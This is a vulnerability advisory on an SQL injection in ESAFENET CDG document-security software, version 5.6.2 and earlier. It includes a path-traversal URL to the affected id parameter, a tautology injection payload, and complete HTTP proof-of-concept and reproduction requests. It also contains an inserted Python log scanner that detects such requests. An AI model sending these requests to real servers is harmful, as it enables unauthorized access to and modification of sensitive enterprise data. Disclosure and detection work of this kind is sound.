ESAFENET CDG SQL Injection

Authors: Ma Qiutong, Li Shudong, Lin Zihao

System Description

The new generation electronic document security management system by eSecurity (abbreviated as: CDG) is a comprehensive data intelligent security product that integrates core technologies such as document encryption, data classification and grading, access control, association analysis, big data analysis, and intelligent recognition. The product includes ten core components: transparent encryption, intelligent encryption, permission documents, data classification and grading, terminal security management, file outbound management, group control, data security gateway, encryption and decryption interface middleware, and USB client. The scope of protection covers terminal computers (Windows, Mac, and Linux system platforms), smart terminals (Android, iOS), and various application systems (OA, knowledge management, document management, project management, PDM, etc.). It can provide full lifecycle protection for enterprise core data assets from production, storage, circulation, and outbound transmission to destruction. By uniformly protecting against both “intentional” and “unintentional” data leakage behaviors, and adopting the design concept of “proactive defense before the event, real-time control during the event, and timely tracking after the event to comprehensively prevent leakage,” combined with capabilities such as identity authentication, data classification, level marking, permission control, application integration, secure access, risk warning, and behavior auditing, it ensures comprehensive protection of user terminal data security.

Vulnerability Description

There is an SQL injection vulnerability in CDG version 5.6.2 and earlier.

This vulnerability allows attackers to manipulate the application's database through specially crafted SQL query strings. Because user input is not sufficiently validated, attackers can insert malicious SQL code into input fields and thereby bypass authentication, access or modify sensitive data in the database, or even perform database management operations.

Affected Parameters

<https://example.com/CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../ztree/data.jsp&id=123>

SQL injection exists in the id parameter of the data.jsp page.
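As an added defensive example (not part of the original advisory), the following Python script scans access-log lines for requests to the affected endpoint whose id parameter is not a plain integer, resolving the js/.. path segment and URL encoding first so that encoded variants of the same request are not missed. The log lines, source addresses and the assumption that a legitimate id is numeric are constructed for this example.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (CLF-style), not taken from any real CDG deployment:
# a benign request to the affected endpoint, the advisory's tautology payload, and
# the same payload percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0800] "GET /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../ztree/data.jsp&id=123 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0800] "GET /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../ztree/data.jsp&id=123'+or+'1'='1 HTTP/1.1" 200 8192
10.0.0.9 - - [01/Jan/2024:10:00:07 +0800] "GET /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../ztree/data.jsp&id=123%27%20or%20%271%27%3D%271 HTTP/1.1" 200 8192
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)'
    r'(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
# The affected servlet, compared after resolving "js/.." so path tricks do not hide it.
AFFECTED_PATH = "/CDGServer3/policy/UploadFileToCatalog"
# Assumption: on this endpoint a legitimate id is a plain integer (the POC uses 123).
ID_OK = re.compile(r"^\d+$")


def parse_request(line):
    """Return (src, normalized path, decoded query params) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # parse_qs decodes both '+' and %XX, so encoded variants collapse to one form.
    params = parse_qs(parts.query, keep_blank_values=True)
    return m["src"], posixpath.normpath(parts.path), params


def find_suspicious(log_text):
    """Flag requests to the affected endpoint whose id parameter is not an integer."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_request(line)
        if parsed is None:
            continue
        src, path, params = parsed
        if path != AFFECTED_PATH:
            continue
        for value in params.get("id", []):
            if not ID_OK.match(value):
                hits.append({"src": src, "id": value})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"{hit['src']}: non-numeric id -> {hit['id']!r}")
```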

Vulnerability URL Example

https://x.x.x.x:8443/CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../ztree/data.jsp&id=123'+or+'1'='1

Vulnerability POC

GET /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../ztree/data.jsp&id=123 HTTP/1.1
Host: x.x.x.x:8443
Cookie: JSESSIONID=C373554BF32B5C096CCA66983B818BB2
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


Vulnerability Recurrence

We can use Burp Suite for testing:

IP-1

GET /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../ztree/data.jsp&id=123'+or+'1'='1 HTTP/1.1
Host: x.x.x.x:8443
Cookie: JSESSIONID=C373554BF32B5C096CCA66983B818BB2
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
